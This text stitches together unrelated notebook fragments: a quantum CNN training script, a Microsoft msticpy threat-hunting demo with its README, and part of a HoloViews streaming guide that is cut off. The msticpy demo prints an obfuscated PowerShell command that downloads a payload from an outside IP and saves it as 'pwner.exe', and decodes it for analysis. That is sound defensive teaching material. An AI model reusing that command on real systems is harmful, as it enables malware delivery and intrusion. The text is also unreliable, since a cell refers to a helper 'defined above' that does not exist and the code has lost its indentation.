# Second Quantum Conv Layer, trainable params = 18*L, output size = 6 x 6
num_conv_layer_2 = 2
q_conv_layer_2 = qml.qnn.KerasLayer(q_conv, {"conv_params": (2, num_conv_layer_2, 9)}, output_dim=(1), name='Quantum_Conv_Layer_2')
size_2 = int(1+(reshape_layer_1.shape[1]-c_filter)/c_strides)
q_conv_layer_2_list = []
# height iteration
for i in range(size_2):
# width iteration
for j in range(size_2):
temp = q_conv_layer_2(reshape_layer_1[:, 2*i:2*(i+1)+1, 2*j:2*(j+1)+1])
temp = tf.keras.layers.Reshape((1,))(temp)
q_conv_layer_2_list += [temp]
concat_layer_2 = tf.keras.layers.Concatenate(axis=1)(q_conv_layer_2_list)
reshape_layer_2 = tf.keras.layers.Reshape((size_2, size_2, 1))(concat_layer_2)
# Max Pooling Layer, output size = 9
max_pool_layer = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=None, name='Max_Pool_Layer')(reshape_layer_2)
reshape_layer_3 = tf.keras.layers.Reshape((9,))(max_pool_layer)
# Quantum FC Layer, trainable params = 18*L*n_class + 2, output size = 2
num_fc_layer = 1
q_fc_layer = qml.qnn.KerasLayer(q_fc, {"params": (2, num_fc_layer, n_class, 9)}, output_dim=n_class)(reshape_layer_3)
# Alpha Layer
alpha_layer = class_weights()(q_fc_layer)
model = tf.keras.Model(inputs=X, outputs=[alpha_layer])
model(X_train[0:5, :, :])
import keras.backend as K
# def custom_loss(y_true, y_pred):
# return K.sum(((y_true.shape[1]-2)*y_true+1)*K.square(y_true-y_pred))/len(y_true)
def custom_loss(y_true, y_pred):
return K.sum(K.square(y_true-y_pred))/len(y_true)
opt = tf.keras.optimizers.Adam(learning_rate=0.1)
model.compile(opt, loss=custom_loss, metrics=["accuracy"])
H = model.fit(X_train, Y_train, epochs=20, batch_size=32, validation_data=(X_test, Y_test), verbose=1)
# 1L QConv1, 1L QConv2, 1L QFC, no entangler at all
# 1 epoch = ... hours
8000/(60*60)
```
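A quick standalone sanity check of the ``density_matrix`` helper defined above (plain NumPy, independent of PennyLane): because ``state`` is a column vector, the elementwise product with its conjugate transpose broadcasts to the outer product |ψ⟩⟨ψ|.

```python
import numpy as np

def density_matrix(state):
    # A (2, 1) column vector times its (1, 2) conjugate transpose
    # broadcasts to the (2, 2) outer product |psi><psi|.
    return state * np.conj(state).T

label_0 = np.array([[1], [0]], dtype=complex)
dm = density_matrix(label_0)   # the |0><0| projector
```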
# MSTICPY and Jupyter Notebooks
### [msticpy GitHub](https://github.com/microsoft/msticpy)
### Built to make writing and reading of CyberSec notebooks faster, simpler and cleaner
`!pip install msticpy`
### Ian Hellen
**Principal SDE Microsoft Threat Intelligence Center, Azure Cloud and AI**
Email [ianhelle@microsoft.com](mailto:ianhelle@microsoft.com)<br>
Twitter [@ianhellen](https://twitter.com/ianhellen)
# Authenticating and getting data
```
# Imports
from msticpy.nbtools import nbinit
nbinit.init_notebook(
namespace=globals(),
)
from msticpy.sectools.ip_utils import get_whois_info
from mp_data import TILookupDemo as TILookup
from mp_data import GeoLiteLookupDemo as GeoLiteLookup
from mp_data import get_whois_info_demo as get_whois_info
sns.set()
# Set up data and authenticate
ws_config = WorkspaceConfig(workspace="ASIHuntOMSWorkspaceV4")
qry_prov = QueryProvider(
data_environment='LocalData',
data_paths=["./data"],
query_paths=["./data"],
)
qry_prov.connect(connection_str=ws_config.code_connect_str)
```
## Viewing and Managing Alerts
```
from datetime import datetime
search_origin = datetime(2019, 2, 17)
search_q_times = nbwidgets.QueryTime(units='day', max_before=20,
before=3, after=2, max_after=5,
origin_time=search_origin, auto_display=True)
from msticpy.nbtools.timeline import display_timeline
def show_full_alert(input_alert):
global selected_alert
selected_alert = SecurityAlert(input_alert)
return nbdisplay.format_alert(selected_alert, show_entities=False)
alert_list = qry_prov.SecurityAlert.list_alerts(search_q_times)
utils.md("Alerts", "large, bold")
utils.md(f"From {search_q_times.start} to {search_q_times.end} - choose an alert to display", "bold")
display_timeline(data=alert_list, source_columns=["AlertName","CompromisedEntity"], group_by="Severity", height=200)
alert_select = nbwidgets.SelectAlert(alerts=alert_list, action=show_full_alert, auto_display=True)
# select an alert
alert_select._w_select_alert.index = 5
utils.md("Visualize Entities", "large, bold")
utils.md("The red circle is the alert object. Green circles are the related entities.")
alertentity_graph = create_alert_graph(selected_alert)
nbdisplay.plot_entity_graph(alertentity_graph, width=800, node_size=15)
```
## Context for an Event or Alert
### Display Process Tree, Process Timeline, Trawl for IoCs
```
# run the query to get the process tree
process_df = qry_prov.WindowsSecurity.get_process_tree(selected_alert,
start=search_q_times.start,
end=search_q_times.end)
from msticpy.nbtools import process_tree
utils.md("Process tree for alert process.", "bold, large")
process_tree.build_and_show_process_tree(data=process_df, legend_col="Account")
utils.md("Interactive event timeline view", "bold, large")
nbdisplay.display_timeline(data=process_df, alert=selected_alert,
title='Alert Process Session', height=150, range_tool=False)
utils.md("IoCs found in commandlines", "bold, large")
IoCExtract().extract(data=process_df, columns=['CommandLine'],
ioc_types=['ipv4', 'ipv6', 'dns', 'url', 'md5_hash', 'sha1_hash', 'sha256_hash'])
```
# Investigating obfuscated commands
<br><span style="font-family:monospace; font-size:x-large; overflow-wrap: break-word">
powershell.exe -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==</span>
#### A common attacker technique for disguising their intent
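Before looking at the msticpy helper in the next cell, note that the decoding step itself needs nothing beyond the standard library. A minimal sketch (this demo payload is plain UTF-8 base64; real PowerShell ``-encodedcommand`` payloads are UTF-16LE encoded):

```python
import base64

# The -encodedcommand payload from the sample alert above
encoded = "SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg=="
decoded = base64.b64decode(encoded).decode("utf-8")
print(decoded)  # reveals the download-and-save command and the attacker IP
```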
```
separator = lambda: print("-" * 80)
encoded_cmd = '''powershell.exe -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlc
XVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg=='''
utils.md("Encoded command", "bold, large")
print(encoded_cmd)
dec_string, dec_df = base64unpack.unpack_items(input_string=encoded_cmd)
separator()
utils.md("Decoded command", "bold, large")
print(dec_string)
separator()
iocs = IoCExtract().extract(dec_string)
utils.md("IoCs Found", "bold, large")
for ioc in iocs:
print(ioc, iocs[ioc])
separator()
# ti_lookup = TILookup() # Use this if not in demo mode
ti_lookup = TILookup()
utils.md("Threat Intel results", "bold, large")
for ioc_type, ioc_set in iocs.items():
if ioc_type not in ["ipv4","ipv6", "url"]:
continue
print(f"\nLooking up {ioc_type}s...", end="")
for ioc in ioc_set:
print(ioc, end="")
ti_results = ti_lookup.lookup_ioc(observable=ioc, ioc_type=ioc_type)
display(ti_lookup.result_to_df(ti_results)[["Ioc", "Details", "Severity", "RawResult"]])
```
# Network Data
## IP Geolocation of an Attacker
```
# Look up the location
geo = GeoLiteLookup()
_, ip_locs = geo.lookup_ip(ip_addr_list=list(iocs["ipv4"]))
from msticpy.nbtools.foliummap import FoliumMap, get_map_center
# calculate the map center (average of lats/longs)
lat_longs = [(ip["Location"]["Latitude"], ip["Location"]["Longitude"]) for ip in ip_locs]
map_center = sum([ll[0] for ll in lat_longs])/len(lat_longs), sum([ll[1] for ll in lat_longs])/len(lat_longs)
# build the map and display
geo_map = FoliumMap(location=map_center, zoom_start=5, height="75%", width="75%")
geo_map.add_ip_cluster(ip_entities=ip_locs, color='red')
utils.md("Geolocations for IP addresses", "large, bold")
utils.md("Click on a marker for more information")
display(geo_map.folium_map)
```
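The map-center computation in the cell above is just an arithmetic mean of the coordinate pairs; here is a standalone sketch of the same calculation (the helper name is ours — msticpy also exports ``get_map_center`` for this job):

```python
def mean_center(lat_longs):
    """Average a list of (latitude, longitude) pairs into a single point."""
    lats = [ll[0] for ll in lat_longs]
    lons = [ll[1] for ll in lat_longs]
    return sum(lats) / len(lats), sum(lons) / len(lons)

# Three illustrative west-coast points
center = mean_center([(47.6, -122.3), (37.8, -122.4), (34.1, -118.2)])
```

A plain mean misbehaves for clusters straddling the antimeridian, but it is fine for a small cluster like the one plotted here.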
### Query network data
```
az_net_comms_df = qry_prov.Network.list_azure_network_flows_by_host(search_q_times, selected_alert)
for field in ["TimeGenerated", "FlowStartTime", "FlowEndTime", "FlowIntervalEndTime"]:
az_net_comms_df[field] = az_net_comms_df[field] + pd.Timedelta(1, "day")
# For demo purposes we're adding our suspect IP to the DataFrame
t_index = az_net_comms_df[
(az_net_comms_df["L7Protocol"] == "http")
& (az_net_comms_df["FlowStartTime"] == pd.Timestamp("2019-02-13 13:46:48"))
].index[0]
az_net_comms_df.loc[t_index, "PublicIPs"] = [["38.75.137.9"]]
az_net_comms_df.loc[t_index, "AllExtIPs"] = "38.75.137.9"
print(len(az_net_comms_df), "records read")
```
### Analyze Network traffic flows on host
#### Timelines of In/Out traffic and traffic by protocol show anomalies late on 2/14/2019
```
timeline_plot = nbdisplay.display_timeline(
data=az_net_comms_df,
group_by="FlowDirection",
title="Network Flows by Direction - Note unusual cluster of inbound traffic",
time_column="FlowStartTime",
source_columns=["FlowType", "AllExtIPs", "L7Protocol", "FlowDirection"],
height=150,
legend="right",
yaxis=True
)
flow_plot = nbdisplay.display_timeline_values(
data=az_net_comms_df[az_net_comms_df["L7Protocol"] != "https"],
group_by="L7Protocol",
source_columns=["FlowStartTime",
"FlowType",
"AllExtIPs",
"L7Protocol",
"FlowDirection",
"TotalAllowedFlows"],
time_column="FlowStartTime",
title="Network flows by Layer 7 Protocol",
y="TotalAllowedFlows",
legend="right",
height=400,
kind=["vbar", "circle"]
)
```
### Lookup the ASN of the external IPs and see if there are unusual items
Note: the WHOIS lookups for each IP take some time...
In the plot, note that there is a single IP flow burst for only a few ASNs (e.g. `AS-GLOBALTELEHOST, US`, the ASN of our attacker's IP address); most others repeat over time.
```
az_http = az_net_comms_df[(az_net_comms_df["L7Protocol"] == "http")].copy()
az_http["ExtASN"] = az_http.apply(lambda x: get_whois_info(x.AllExtIPs, show_progress=True)[0], axis=1)
nbdisplay.display_timeline(
data=az_http,
group_by="ExtASN",
title="Network Flows by ASN",
time_column="FlowStartTime",
source_columns=["FlowType", "AllExtIPs", "L7Protocol", "FlowDirection", "ExtASN"],
height=300,
legend="right",
yaxis=False
);
```
# *end of demo*
---
# References Text
- Azure Sentinel Github Notebooks https://github.com/Azure/Azure-Sentinel/Notebooks/tree/master
- (Samples with data in Sample-Notebooks folder)
- msticpy Github https://github.com/Microsoft/msticpy
- msticpy Docs https://msticpy.readthedocs.io/en/latest/
- Azure Sentinel Tech Community https://techcommunity.microsoft.com/t5/Azure-Sentinel/bd-p/AzureSentinel
- Azure Sentinel Tech Community Blogs https://aka.ms/AzureSentinelBlog
- Jupyter Notebooks and Azure Sentinel HowTo https://docs.microsoft.com/en-us/azure/sentinel/notebooks
- Azure Sentinel Feedback and Questions: mailto:AzureSentinel@microsoft.com
- Azure Sentinel Discussion mailto:DiscussAzureSentinel@microsoft.com
### Notebook blogs https://aka.ms/AzureSentinelBlog
- Security Investigations with Jupyter and Azure Sentinel (parts 1-3)
- Why Use Jupyter for Security Investigations?
- Using Sigma Rules in Azure Sentinel?
- msticpy - Python Defender Tools
[ianhelle@microsoft.com](mailto:ianhelle@microsoft.com) Twitter [@ianhellen](https://twitter.com/ianhellen) LinkedIn [ianhellen](https://www.linkedin.com/in/ianhellen/)
# MSTIC Jupyter and Python Security Tools
### [msticpy GitHub](https://github.com/microsoft/msticpy)
Microsoft Threat Intelligence Python Security Tools.
The **msticpy** package was initially developed to support [Jupyter Notebook](https://jupyter-notebook.readthedocs.io/en/stable/examples/Notebook/What%20is%20the%20Jupyter%20Notebook.html)
authoring for [Azure Sentinel](https://azure.microsoft.com/en-us/services/azure-sentinel/).
Many of the included tools can be used in other security scenarios for threat hunting
and threat investigation. There are three main sub-packages:
- **sectools** - Python security tools to help with data enrichment,
analysis or investigation.
- **nbtools** - Jupyter-specific UI tools such as widgets, plotting and
other data display.
- **data** - data layer and pre-defined queries for Azure Sentinel, MDATP and
other data sources.
We welcome feedback, bug reports, suggestions for new features and contributions.
## Installing
`pip install msticpy`
or for the latest dev build
`pip install git+https://github.com/microsoft/msticpy`
## Documentation
Full documentation is at [ReadTheDocs](https://msticpy.readthedocs.io/en/latest/)
Sample notebooks for many of the modules are in the [docs/notebooks](https://github.com/microsoft/msticpy/blob/master/docs/notebooks) folder and accompanying notebooks.
You can also browse through the sample notebooks referenced at the end of this document
(especially the *Windows Alert Investigation* notebook) to see some of the functionality used in context.
---
## Security Tools Sub-package - `sectools`
This subpackage contains several modules helpful for working on security investigations and hunting:
### base64unpack
Base64 and archive (gz, zip, tar) extractor. Input can either be a single string
or a specified column of a pandas dataframe. It will try to identify any base64 encoded
strings and decode them. If the result looks like one of the supported archive types it
will unpack the contents. The results of each decode/unpack are rechecked for further
base64 content and will recurse down up to 20 levels (default can be overridden).
Output is to a decoded string (for single string input) or a DataFrame (for dataframe input).
[Base64Unpack Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Base64Unpack.ipynb)
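The recursive re-checking described above can be sketched in a few lines (the depth limit and the looks-like-base64 heuristic here are ours, for illustration only — the real module also handles archives and DataFrame input):

```python
import base64
import binascii
import re

B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")

def unpack(data: bytes, max_depth: int = 20) -> bytes:
    """Repeatedly base64-decode while the payload still looks like base64."""
    for _ in range(max_depth):
        stripped = data.strip()
        if len(stripped) % 4 != 0 or not B64_RE.match(stripped):
            return data  # not base64-shaped: stop recursing
        try:
            data = base64.b64decode(stripped, validate=True)
        except binascii.Error:
            return data
    return data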
### iocextract
Uses a set of builtin regular expressions to look for Indicator of Compromise (IoC) patterns.
Input can be a single string or a pandas dataframe with one or more columns specified as input.
The following types are built-in:
- IPv4 and IPv6
- URL
- DNS domain
- Hashes (MD5, SHA1, SHA256)
- Windows file paths
- Linux file paths (this is somewhat noisy, because a legal Linux file path can contain almost any character)
You can modify or add to the regular expressions used at runtime.
Output is a dictionary of matches (for single string input) or a DataFrame (for dataframe input).
[IoCExtract Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/IoCExtract.ipynb)
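A toy version of the same idea, with just two of the built-in pattern types (the real module ships far more patterns and lets you modify or extend them at runtime):

```python
import re

IOC_PATTERNS = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "md5_hash": re.compile(r"\b[A-Fa-f0-9]{32}\b"),
}

def extract_iocs(text):
    """Return a dict mapping IoC type to the set of matches found in text."""
    return {name: set(pat.findall(text)) for name, pat in IOC_PATTERNS.items()}

hits = extract_iocs(
    "GET http://38.75.137.9:9088/encrypt.min.js sig=d41d8cd98f00b204e9800998ecf8427e"
)
```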
### tiproviders
The TILookup class can look up IoCs across multiple TI providers. Built-in
providers include AlienVault OTX, IBM XForce, VirusTotal and Azure Sentinel.
The input can be a single IoC observable or a pandas DataFrame containing
multiple observables. Depending on the provider, you may require an account
and an API key. Some providers also enforce throttling (especially for free
tiers), which might affect performing bulk lookups.
For more details see `TIProviders` and
[TILookup Usage Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TIProviders.ipynb)
### vtlookup
Wrapper class around [Virus Total API](https://www.virustotal.com/en/documentation/public-api/).
Input can be a single IoC observable or a pandas DataFrame containing multiple observables.
Processing requires a Virus Total account and API key and processing performance is limited to
the number of requests per minute for the account type that you have.
Supported IoC types:
- Filehash
- URL
- DNS Domain
- IPv4 Address
[VTLookup Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/VirusTotalLookup.ipynb)
### geoip
Geographic location lookup for IP addresses.
This module has two classes for different services:
- GeoLiteLookup - Maxmind Geolite (see <https://www.maxmind.com>)
- IPStackLookup - IPStack (see <https://ipstack.com>)
Both services offer a free tier for non-commercial use. However,
a paid tier will normally get you more accuracy, more detail and
a higher throughput rate. Maxmind geolite uses a downloadable database,
while IPStack is an online lookup (API key required).
[GeoIP Lookup Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/GeoIPLookups.ipynb)
### eventcluster
This module is intended to be used to summarize large numbers of
events into clusters of different patterns. High volume repeating
events can often make it difficult to see unique and interesting items.
This is an unsupervised learning module implemented using scikit-learn DBSCAN.
The module contains functions to generate clusterable features from
string data. For example, an administration command that
does some maintenance on thousands of servers with a commandline like the following
```bash
install-update -hostname {host.fqdn} -tmp:/tmp/{GUID}/rollback
```
can be collapsed into a single cluster pattern by ignoring the character
values of the host and guids in the string and using delimiters or tokens to
group the values. This allows you to more easily see distinct patterns of
activity.
[Event Clustering Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventClustering.ipynb)
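The feature-generation step can be sketched as: keep the token structure of the command line and discard the variable character values. The placeholder regexes below are ours, chosen just for this example:

```python
import re

def command_pattern(cmdline: str) -> str:
    """Collapse variable values so structurally identical commands compare equal."""
    # Replace GUID-like runs, then dotted hostnames, with fixed placeholders.
    cmdline = re.sub(
        r"\b[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\b", "<GUID>", cmdline
    )
    cmdline = re.sub(r"\b(?:[\w-]+\.){2,}[\w-]+\b", "<FQDN>", cmdline)
    return cmdline

# Two maintenance commands that differ only in host and GUID...
a = command_pattern(
    "install-update -hostname web01.corp.contoso.com "
    "-tmp:/tmp/0f8fad5b-d9cb-469f-a165-70867728950e/rollback"
)
b = command_pattern(
    "install-update -hostname db07.corp.contoso.com "
    "-tmp:/tmp/7c9e6679-7425-40de-944b-e07fc1f90ae7/rollback"
)
# ...collapse to the same cluster pattern.
```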
### outliers
Similar to the eventcluster module, but a little more experimental (read: 'less tested').
It uses the scikit-learn Isolation Forest to identify outlier events in a single data set, or using
one data set as training data and another on which to predict outliers.
### auditdextract
Module to load and decode Linux audit logs. It collapses messages sharing the same
message ID into single events, decodes hex-encoded data fields and performs some
event-specific formatting and normalization (e.g. for process start events it will
re-assemble the process command line arguments into a single string).
This is still a work-in-progress.
### syslog_utils
Module to support investigation of a Linux host with only syslog logging enabled.
This includes functions for collating host data, clustering logon events and detecting
user sessions containing suspicious activity.
### cmd_line
A module to support the detection of known malicious command-line activity or suspicious
patterns of command-line activity.
## Notebook tools sub-package - `nbtools`
This is a collection of display and utility modules designed to make working
with security data in Jupyter notebooks quicker and easier.
- nbwidgets - groups common functionality such as list pickers, time boundary settings, saving and retrieving environment variables into a single line callable command.
- nbdisplay - functions that implement common display of things like alerts, events in a slightly more consumable way than print()
- entityschema - implements entity classes (e.g. Host, Account, IPAddress) used in Log Analytics alerts and in many of these modules. Each entity encapsulates one or more properties related to the entity.
[Notebook Tools Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/NotebookWidgets.ipynb) and [Event Timeline Visualization](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventTimeline.ipynb)
## Data sub-package - `data`
These components are currently still part of the nbtools sub-package but will be
refactored to separate them into their own package.
- QueryProvider - extensible query library targeting Log Analytics or OData
endpoints. Built-in parameterized queries allow complex queries to be run
from a single function call. Add your own queries using a simple YAML
schema.
- security_alert and security_event - encapsulation classes for alerts and events.
- entity_schema - definitions for multiple entities (Host, Account, File, IPAddress,
etc.)
Each has a standard 'entities' property reflecting the entities found in the alert or event.
These can also be used as meta-parameters for many of the queries.
For example, the following query will extract the value for the `hostname` query parameter
from the alert:
`qry.list_host_logons(query_times, alert)`
[Data Queries Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Data_Queries.ipynb)
---
## Clone the notebooks in this repo to Azure Notebooks
Requires sign-in to Azure Notebooks
<a href="https://notebooks.azure.com/import/gh/Microsoft/msticpy">
<img src="https://notebooks.azure.com/launch.png" />
</a>
## More Notebooks
- [Account Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Account.ipynb)
- [Domain and URL Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Domain%20%26%20URL.ipynb)
- [IP Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20IP%20Address.ipynb)
- [Linux Host Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Linux%20Host.ipynb)
- [Windows Host Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Windows%20Host.ipynb)
View directly on GitHub or copy and paste the link into [nbviewer.org](https://nbviewer.jupyter.org/)
## Notebook examples with saved data
See the following notebooks for more examples of the use of this package in practice:
- Windows Alert Investigation in [github](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Investigation%20-%20Process-Alerts.ipynb) or [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Investigation%20-%20Process-Alerts.ipynb)
- Office 365 Exploration in [github](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Hunting%20-%20Office365-Exploring.ipynb) or [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Hunting%20-%20Office365-Exploring.ipynb)
- Cross-Network Hunting in [github](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb) or [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb)
## To-Do Items
- Add additional notebooks to document use of the tools.
- Expand list of supported TI provider classes.
## Supported Platforms and Packages
- msticpy is OS-independent
- Requires [Python 3.6 or later](https://www.python.org/dev/peps/pep-0494/)
- Requires the following python packages: pandas, bokeh, matplotlib, seaborn, setuptools, urllib3, ipywidgets, numpy, attrs, requests, networkx, ipython, scikit_learn, typing
- The following packages are recommended and needed for some specific functionality: Kqlmagic, maxminddb_geolite2, folium, dnspython, ipwhois
See [requirements.txt](requirements.txt) for more details and version requirements.
---
## Contributing
This project welcomes contributions and suggestions. Most contributions require you to agree to a
Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us
the rights to use your contribution. For details, visit <https://cla.microsoft.com>.
When you submit a pull request, a CLA-bot will automatically determine whether you need to provide
a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions
provided by the bot. You will only need to do this once across all repos using our CLA.
This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or
contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.
# Working with Streaming Data
"Streaming data" is data that is continuously generated, often by some external source like a remote website, a measuring device, or a simulator. This kind of data is common for financial time series, web server logs, scientific applications, and many other situations. We have seen how to visualize any data output by a callable in the [Live Data](06-Live_Data.ipynb) user guide and we have also seen how to use the HoloViews stream system to push events in the user guide sections [Responding to Events](11-Responding_to_Events.ipynb) and [Custom Interactivity](12-Custom_Interactivity.ipynb).
This user guide shows a third way of building an interactive plot, using ``DynamicMap`` and streams. Here, instead of pushing plot metadata (such as zoom ranges, user triggered events such as ``Tap`` and so on) to a ``DynamicMap`` callback, the underlying data in the visualized elements are updated directly using a HoloViews ``Stream``.
In particular, we will show how the HoloViews ``Pipe`` and ``Buffer`` streams can be used to work with streaming data sources without having to fetch or generate the data from inside the ``DynamicMap`` callable. Apart from simply setting element data from outside a ``DynamicMap``, we will also explore ways of working with streaming data coordinated by the separate [``streamz``](http://matthewrocklin.com/blog/work/2017/10/16/streaming-dataframes-1) library from Matt Rocklin, which can make building complex streaming pipelines much simpler.
As this notebook makes use of the ``streamz`` library, you will need to install it with ``conda install streamz`` or ``pip install streamz``.
```
import time
import numpy as np
import pandas as pd
import holoviews as hv
from holoviews.streams import Pipe, Buffer
import streamz
import streamz.dataframe
hv.extension('bokeh')
```
## ``Pipe``
A ``Pipe`` allows data to be pushed into a DynamicMap callback to change a visualization, just like the streams in the [Responding to Events](./11-Responding_to_Events.ipynb) user guide were used to push changes to metadata that controlled the visualization. A ``Pipe`` can be used to push data of any type and make it available to a ``DynamicMap`` callback. Since all ``Element`` types accept ``data`` of various forms we can use ``Pipe`` to push data directly to the constructor of an ``Element`` through a DynamicMap.
We can take advantage of the fact that most Elements can be instantiated without providing any data, so we declare the ``Pipe`` with an empty list and then declare the ``DynamicMap``, providing the pipe as a stream; this will dynamically update a ``VectorField``:
```
pipe = Pipe(data=[])
vector_dmap = hv.DynamicMap(hv.VectorField, streams=[pipe])
vector_dmap.redim.range(x=(-1, 1), y=(-1, 1))
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/pipe_vectorfield.gif"></img>
Having set up this ``VectorField`` tied to a ``Pipe`` we can start pushing data to it varying the orientation of the VectorField:
```
x,y = np.mgrid[-10:11,-10:11] * 0.1
sine_rings = np.sin(x**2+y**2)*np.pi+np.pi
exp_falloff = 1/np.exp((x**2+y**2)/8)
for i in np.linspace(0, 1, 25):
time.sleep(0.1)
pipe.send([x,y,sine_rings*i, exp_falloff])
```
This approach of using an element constructor directly does not allow you to use anything other than the default key and value dimensions. One simple workaround for this limitation is to use ``functools.partial`` as demonstrated in the **Controlling the length** section below.
Since ``Pipe`` is completely general and the data can be any custom type, it provides a completely general mechanism to stream structured or unstructured data. Due to this generality, ``Pipe`` does not offer some of the more complex features and optimizations available when using the ``Buffer`` stream described in the next section.
## ``Buffer``
While ``Pipe`` provides a general solution for piping arbitrary data to a ``DynamicMap`` callback, ``Buffer`` provides a very powerful means of working with streaming tabular data, defined as pandas dataframes, arrays or dictionaries of columns (as well as StreamingDataFrame, which we will cover later). ``Buffer`` automatically accumulates the last ``N`` rows of the tabular data, where ``N`` is defined by the ``length`` parameter.
The ability to accumulate data allows performing operations on a recent history of data, while plotting backends (such as bokeh) can optimize plot updates by sending just the latest patch. This optimization works only if the ``data`` object held by the ``Buffer`` is identical to the plotted ``Element`` data, otherwise all the data will be updated as normal.
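Conceptually, the accumulation is a bounded queue: once ``length`` rows have arrived, each new row evicts the oldest. A plain-Python sketch of that behavior (the real ``Buffer`` operates on DataFrames/arrays and patches the plot incrementally):

```python
from collections import deque

recent = deque(maxlen=5)   # keep only the last 5 "rows"
for row in range(12):      # push 12 rows through the buffer
    recent.append(row)
print(list(recent))        # only the final five survive: [7, 8, 9, 10, 11]
```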
#### A simple example: Brownian motion
To initialize a ``Buffer`` we have to provide an example dataset which defines the columns and dtypes of the data we will be streaming. Next we define the ``length`` to keep the last 100 rows of data. If the data is a DataFrame we can specify whether we will also want to use the ``DataFrame`` ``index``. In this case we will simply define that we want to plot a ``DataFrame`` of 'x' and 'y' positions and a 'count' as ``Points`` and ``Curve`` elements:
```
example = pd.DataFrame({'x': [], 'y': [], 'count': []}, columns=['x', 'y', 'count'])
dfstream = Buffer(example, length=100, index=False)
curve_dmap = hv.DynamicMap(hv.Curve, streams=[dfstream])
point_dmap = hv.DynamicMap(hv.Points, streams=[dfstream])
```
After applying some styling we will display an ``Overlay`` of the dynamic ``Curve`` and ``Points``
```
%%opts Points [color_index='count', xaxis=None, yaxis=None] (line_color='black', size=5)
%%opts Curve (line_width=1, color='black')
curve_dmap * point_dmap
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/brownian.gif"></img>
Now that we have set up the ``Buffer`` and defined a ``DynamicMap`` to plot the data we can start pushing data to it. We will define a simple function which simulates brownian motion by accumulating x, y positions. We can ``send`` data through the ``hv.streams.Buffer`` directly.
```
def gen_brownian():
x, y, count = 0, 0, 0
while True:
x += np.random.randn()
y += np.random.randn()
count += 1
yield pd.DataFrame([(x, y, count)], columns=['x', 'y', 'count'])
brownian = gen_brownian()
for i in range(200):
dfstream.send(next(brownian))
```
Finally we can clear the data on the stream and plot using the ``clear`` method:
```
dfstream.clear()
```
## Using the Streamz library
Now that we have discovered what ``Pipe`` and ``Buffer`` can do it's time to show how you can use them together with the ``streamz`` library. Although HoloViews does not depend on ``streamz`` and you can use the streaming functionality without needing to learn about it, the two libraries work well together, allowing you to build pipelines to manage continuous streams of data. Streamz is easy to use for simple tasks, but also supports complex pipelines that involve branching, joining, flow control, feedback and more. Here we will mostly focus on connecting streamz output to ``Pipe`` and then ``Buffer`` so for more details about the streamz API, consult the [streamz documentation](https://streamz.readthedocs.io/en/latest/).
#### Using ``streamz.Stream`` together with ``Pipe``
Let's start with a fairly simple example:
1. Declare a ``streamz.Stream`` and a ``Pipe`` object and connect them into a pipeline into which we can push data.
2. Use a ``sliding_window`` of 20, which will first wait for 20 sets of stream updates to accumulate. At that point and for every subsequent update, it will apply ``pd.concat`` to combine the most recent 20 updates into a new dataframe.
3. Use the ``sink`` method on the ``streamz.Stream`` to ``send`` the resulting collection of 20 updates to ``Pipe``.
4. Declare a ``DynamicMap`` that takes the sliding window of concatenated DataFrames and displays it using a ``Scatter`` Element.
5. Color the ``Scatter`` points by their 'count' and set a range, then display:
